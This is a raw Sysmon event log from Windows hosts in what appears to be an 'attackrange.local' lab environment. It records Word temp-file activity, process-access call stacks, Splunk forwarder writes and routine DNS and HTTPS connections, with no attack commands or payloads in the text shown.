Office\root\Office16\WINWORD.EXEC:\Users\ADMINI~1\AppData\Local\Temp\2\~DFFD7479C2133EC621.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x8000000000000000292715Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.740{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Word\AutoRecovery save of Atomic.asdMD5=DD638CE4516132E5225E901BC98BAAA1,SHA256=E48FA1034C5DD9C5629D0CC18FEB7778C9C16C5D35875BBA6B10E272A6E96349,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292714Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.740{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\ADMINI~1\AppData\Local\Temp\2\~DF03DE9104B00F0A26.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x8000000000000000292713Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.740{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{29493D5C-0A44-4709-B42C-62CC7C2B95E3}.tmpMD5=FB294ADA09B99EF2DEFEDC229C6C3EF7,SHA256=8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292712Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.725{BEA10069-D4AF-6086-5601-00000000BB01}4365540C:\Windows\Explorer.EXE{BEA10069-2590-6087-DA0F-00000000BB01}3156C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\windows.storage.dll+3c6d1e|C:\Windows\System32\windows.storage.dll+3c8d0e|C:\Windows\System32\windows.storage.dll+13c3e3|C:\Windows\System32\windows.storage.dll+13bdd9|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292711Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.725{BEA10069-D4AF-6086-5601-00000000BB01}4365540C:\Windows\Explorer.EXE{BEA10069-2590-6087-DA0F-00000000BB01}3156C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\windows.storage.dll+3c9e7e|C:\Windows\System32\windows.storage.dll+3c5b4f|C:\Windows\System32\windows.storage.dll+3c6c90|C:\Windows\System32\windows.storage.dll+3c8d0e|C:\Windows\System32\windows.storage.dll+13c3e3|C:\Windows\System32\windows.storage.dll+13bdd9|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292710Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.725{BEA10069-2590-6087-DA0F-00000000BB01}31566328C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+3c73e8|C:\Windows\System32\windows.storage.dll+3cb9df|C:\Windows\System32\windows.storage.dll+3cbf38|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175294|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175179|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292709Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.725{BEA10069-2590-6087-DA0F-00000000BB01}31566328C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+3c73cc|C:\Windows\System32\windows.storage.dll+3cb9df|C:\Windows\System32\windows.storage.dll+3cbf38|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175294|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175179|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292708Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.725{BEA10069-2590-6087-DA0F-00000000BB01}31566328C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+3c73cc|C:\Windows\System32\windows.storage.dll+3cb9df|C:\Windows\System32\windows.storage.dll+3cbf38|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175294|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175179|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292707Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.208{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1581DF7F656804DEF97A6521CF692570,SHA256=D5275B2F45D3E3AED70D06A8E88643C966F9791F2C2418DB4EFE9B6B300F9E8C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441356Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:59.226{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441355Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:59.226{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292706Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.192{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5831F046DC56CD84CD07B2050DEDCD6A,SHA256=DB07ECCE6B563C90D8AF4D66A54FE6237BDAB5C2FBF374823BA342E417846D37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292705Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.192{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=54E0F19054E8BEEE8986856D4922E54D,SHA256=56BB15B75C7AC17179387DFA0C58D597A48311D92EA395CF3792ED4A83066FC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441362Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:00.877{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=418FC8C24B6D73A73D82147EB064F2C6,SHA256=0FC566D98C6F70D6614B16792C40AF548D72F42E35B71B62A92BC6BF0E64B7BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441361Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:00.876{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BE12286DDB863C5AF1FEAF1051A800E0,SHA256=AC21FAF14DE7D1E93FCFAE248EB4951E1D22740C6C1243E43F227612EC56552B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441360Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:00.579{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A843DF948BFB3BC63029459A5844861,SHA256=3041DB6B4FCBCBF5CB19BD2449E6F9A4FB7CF4CB43FAE1E5D31487BF182480FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292757Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:00.880{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5831F046DC56CD84CD07B2050DEDCD6A,SHA256=DB07ECCE6B563C90D8AF4D66A54FE6237BDAB5C2FBF374823BA342E417846D37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292756Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:00.510{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38C2628899DB42F574B4C8F5DC1F7C67,SHA256=8888D4F693D1985C94CE3E13E3FF188EF51B35C8388D591E8088EB98262115B4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292755Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:00.341{BEA10069-D0C2-6086-1000-00000000BB01}9445492C:\Windows\system32\svchost.exe{BEA10069-029C-6088-102A-00000000BB01}5104C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292754Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:00.341{BEA10069-D0C2-6086-1000-00000000BB01}9441148C:\Windows\system32\svchost.exe{BEA10069-029C-6088-102A-00000000BB01}5104C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292753Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:00.341{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-029C-6088-102A-00000000BB01}5104C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292752Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:00.326{BEA10069-D4AB-6086-4301-00000000BB01}33842096C:\Windows\system32\csrss.exe{BEA10069-029C-6088-102A-00000000BB01}5104C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000292751Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:00.326{BEA10069-D0C1-6086-0500-00000000BB01}416952C:\Windows\system32\csrss.exe{BEA10069-029C-6088-102A-00000000BB01}5104C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000292750Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:00.326{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-029C-6088-102A-00000000BB01}5104C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000292749Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:57.487{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50641-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000441359Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:00.227{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441358Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:00.227{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292748Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:00.094{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{94EFAA50-0CF5-4B62-8277-2FE41B3C49E1}.tmpMD5=12CEBA7B73227EA4510134DEC8453E00,SHA256=28B1EC17C83F921A6E64762A65082AC5432A115756DA48155EC21AC5A6F830FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292747Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:00.056{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\winword.exe.db-walMD5=3BB425105E0BCED1F208BED63E9F5937,SHA256=6F343B8D06B8916D4FD6BF6083880280EF446E32B2E34E2471938AFC35D1772C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292746Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:00.056{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\winword.exe.db-shmMD5=2244953EEC618695FEF7BF373BBB6E8F,SHA256=FCC3547EA8DFDFE217DD67038BCC1C6CD08407FF02A57D4063B8289A53EC8592,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441367Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:01.583{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B8785AD4979CDF7B4DAC69B7A45C436,SHA256=1A9ED288605F0226646702B6DCBFF2E0E7C148B953A5562730BEA0AF0E0C9BA1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000292759Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.156{BEA10069-276A-6087-1610-00000000BB01}2640C:\Program Files\Mozilla Firefox\firefox.exeWIN-HOST-96\Administratortcptruefalse10.0.1.15win-host-96.attackrange.local50642-false54.149.10.221ec2-54-149-10-221.us-west-2.compute.amazonaws.com443https 23542300x8000000000000000292758Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:01.228{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=350DD84027C690695E56834B84CD2523,SHA256=CC4417CE72F03CEFAD9A574166C3E3CD29BB6254BA2C03510DA3E1A1AB137585,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000441366Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:58.402{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-932.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal64100- 354300x8000000000000000441365Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:58.306{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-932.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal64307- 10341000x8000000000000000441364Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:01.228{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441363Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:01.228{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441373Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:02.589{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C991F2E89DA35593246D1B1C126900B3,SHA256=A8B5095A018A991D61D614C651CA2C6883D4F8D5D172C44FD3F802E02473418C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000292774Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.265{BEA10069-2590-6087-DA0F-00000000BB01}3156C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEWIN-HOST-96\Administratortcptruefalse10.0.1.15win-host-96.attackrange.local50643-false138.91.136.108-443https 23542300x8000000000000000292773Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:02.260{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86E61402FDAAC872FCE72D54BA539B59,SHA256=3AC9CE5F9ADE2002B0E7A841CC0C0D87EB4A6471403DEE82EF7F183735F16019,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000441372Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 